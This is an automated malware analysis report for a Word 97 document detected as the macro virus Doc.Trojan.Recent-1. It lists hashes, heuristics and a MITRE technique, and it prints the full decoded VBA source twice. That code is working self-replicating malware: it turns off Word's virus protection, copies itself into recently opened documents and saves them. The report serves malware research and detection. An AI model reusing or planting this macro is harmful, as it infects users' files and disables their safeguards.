Office (OLE) malware analysis — malicious · 4786cc5fbda01c9f

MALICIOUS

Office (OLE)

27.5 KB Created: 1999-06-20 08:49:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: beb26569bc1a0158cb65b69beb62178d SHA-1: a17610f9ccba9e975e898384c76e0e56ef89056f SHA-256: 4786cc5fbda01c9f434cee2386ebc2f38040c124ee55bff4f93be83c259b584a

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample contains VBA macros that are designed to minimize the Word application window and potentially infect other recently opened documents. The macro code includes a string 'Strife' which is likely a marker or name associated with the malware. The ClamAV detection 'Doc.Trojan.Recent-1' further supports the malicious nature and the observed behavior of spreading to recent files.

Heuristics 2

ClamAV: Doc.Trojan.Recent-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Recent-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 847 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	847 bytes
SHA-256: `564174068ee65611a752d35ec3e4b454be6b3910cf2c753e2ece1309281ace01`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Close() Application.WindowState = wdWindowStateMinimize Set a = MacroContainer.VBProject: Options.VirusProtection = False Set ab = a.vbcomponents(1): Set abc = ab.codemodule For i = 1 To RecentFiles.Maximum RecentFiles(i).Open Dn = RecentFiles(1).Name Set s = Documents(Dn): Set nh = s.VBProject.vbcomponents(1).codemodule If nh.countoflines < 5 Then nh.addfromstring abc.lines(1, abc.countoflines) s.Save End If Next If Day(Now()) = Int(Rnd * 31) + 1 Then MsgBox "¿Strife?", 64 Application.Quit End Sub Rem Another macro virus by Jack Twoflower LineZerØ/Metaphase

SHA-256: 564174068ee65611a752d35ec3e4b454be6b3910cf2c753e2ece1309281ace01

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()
Application.WindowState = wdWindowStateMinimize
Set a = MacroContainer.VBProject: Options.VirusProtection = False
Set ab = a.vbcomponents(1): Set abc = ab.codemodule
For i = 1 To RecentFiles.Maximum
RecentFiles(i).Open
Dn = RecentFiles(1).Name
Set s = Documents(Dn): Set nh = s.VBProject.vbcomponents(1).codemodule
If nh.countoflines < 5 Then
nh.addfromstring abc.lines(1, abc.countoflines)
s.Save
End If
Next
If Day(Now()) = Int(Rnd * 31) + 1 Then MsgBox "¿Strife?", 64
Application.Quit
End Sub

Rem Another macro virus by Jack Twoflower LineZerØ/Metaphase

Open this report in the interactive analyzer, or submit your own file for analysis.